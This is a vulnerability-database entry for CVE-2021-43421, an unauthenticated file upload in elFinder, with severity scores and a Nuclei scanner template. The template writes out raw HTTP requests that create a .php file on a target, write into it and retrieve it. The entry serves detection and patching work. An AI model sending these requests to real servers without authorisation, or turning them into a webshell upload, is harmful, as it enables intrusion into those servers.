Lucene search

ProjectDiscoveryNUCLEI:CVE-2021-43421

HistoryNov 24, 2022 - 5:35 a.m.

Studio-42 elFinder <2.1.60 - Arbitrary File Upload

2022-11-2405:35:34

ProjectDiscovery

github.com

cve

elfinder

file upload

remote code execution

std42

unauthenticated

vulnerability

CVSS2

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

CVSS3

9.8

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

AI Score

9.7

Confidence

High

EPSS

0.066

Percentile

93.8%

JSON

Studio-42 elFinder 2.0.4 to 2.1.59 is vulnerable to unauthenticated file upload via connector.minimal.php which could allow a remote user to upload arbitrary files and execute PHP code.

id: CVE-2021-43421

info:
  name: Studio-42 elFinder <2.1.60 - Arbitrary File Upload
  author: akincibor
  severity: critical
  description: |
    Studio-42 elFinder 2.0.4 to 2.1.59 is vulnerable to unauthenticated file upload via connector.minimal.php which could allow a remote user to upload arbitrary files and execute PHP code.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to upload malicious files to the server and execute arbitrary code.
  remediation: |
    Upgrade to the latest version of Studio-42 elFinder plugin (2.1.60 or higher) to mitigate this vulnerability.
  reference:
    - https://github.com/Studio-42/elFinder/issues/3429
    - https://twitter.com/infosec_90/status/1455180286354919425
    - https://nvd.nist.gov/vuln/detail/CVE-2021-43421
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2021-43421
    cwe-id: CWE-434
    epss-score: 0.05253
    epss-percentile: 0.93023
    cpe: cpe:2.3:a:std42:elfinder:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 3
    vendor: std42
    product: elfinder
  tags: cve,cve2021,elfinder,fileupload,rce,intrusive,std42

http:
  - raw:
      - |
        GET /elFinder/php/connector.minimal.php?cmd=mkfile&target=l1_Lw&name={{randstr}}.php:aaa HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
      - |
        GET /elFinder/php/connector.minimal.php?cmd=put&target={{hash}}&content={{randstr_1}} HTTP/1.1
        Host: {{Hostname}}
      - |
        GET /elfinder/files/{{randstr}}.php%3Aaaa?_t= HTTP/1.1
        Host: {{Hostname}}
        Accept: */*

    matchers:
      - type: dsl
        dsl:
          - 'contains(body_3, "{{randstr_1}}")'
          - "status_code == 200"
        condition: and

    extractors:
      - type: regex
        name: hash
        group: 1
        regex:
          - '"hash"\:"(.*?)"\,'
        internal: true
# digest: 4b0a00483046022100df993e9b9153b842893b2405cf8a93a320330ae88a22f3d82a5fa06dd4733e84022100e62912c89bef546ec5b95ecf04d6d37c29f8f46c127f151f6ee890efce8a3c68:922c64590222798bb761d5b6d8e72950

References

github.com/ARPSyndicate/kenzer-templates

github.com/Studio-42/elFinder/issues/3429

nvd.nist.gov/vuln/detail/CVE-2021-43421

twitter.com/infosec_90/status/1455180286354919425

CVSS2

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

CVSS3

9.8

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

AI Score

9.7

Confidence

High

EPSS

0.066

Percentile

93.8%

JSON

Related for NUCLEI:CVE-2021-43421